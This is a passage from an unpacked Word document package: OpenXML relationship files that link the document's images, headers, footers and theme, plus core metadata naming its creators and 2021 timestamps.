Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image121.jpg"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image137.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpg"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image132.jpg"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image160.jpg"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image162.jpg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header5.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.jpg"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpg"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.jpg"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.jpg"/><Relationship Id="rId154" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.jpg"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image127.jpg"/><Relationship Id="rId196" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image254.jpg"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image150.jpg"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId221" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header24.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpg"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.jpg"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.jpg"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer21.xml"/><Relationship Id="rId144" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.jpg"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.jpg"/><Relationship Id="rId165" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image394.jpg"/><Relationship Id="rId186" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image138.jpg"/><Relationship Id="rId211" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image515.jpg"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId69" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.jpg"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.jpg"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image88.jpg"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image52.jpeg"/><Relationship Id="rId155" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.jpg"/><Relationship Id="rId176" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.jpg"/><Relationship Id="rId197" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.jpg"/><Relationship Id="rId201" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image151.jpg"/><Relationship Id="rId222" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer24.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.jpg"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image78.jpg"/><Relationship Id="rId70" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.jpg"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image63.jpg"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image99.jpg"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image399.jpg"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.jpeg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image562.jpg"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer5.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.jpg"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.jpg"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image89.jpg"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.jpg"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.jpg"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image148.jpg"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.jpeg"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.jpg"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.jpg"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image100.jpg"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.jpg"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.jpg"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.jpg"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.jpg"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image510.jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header6.xml"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.jpg"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.jpg"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image90.jpg"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image111.jpg"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.jpg"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.jpg"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image149.jpg"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.jpg"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image80.jpg"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image101.jpg"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.jpg"/></Relationships>
</file>

<file path=word/_rels/footer11.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/></Relationships>
</file>

<file path=word/_rels/footer12.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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jpg"/></Relationships>
</file>

<file path=word/_rels/footer5.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jpg"/></Relationships>
</file>

<file path=word/_rels/footer6.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.jp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3</Pages>
  <Words>2454</Words>
  <Characters>13989</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>116</Lines>
  <Paragraphs>32</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>16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werPoint Presentation</dc:title>
  <dc:subject/>
  <dc:creator>Karat McFall</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>James Honeycutt</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-01T01:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-01T01:44:00Z</dcterms:modified>
</cp:coreProperties>
</file>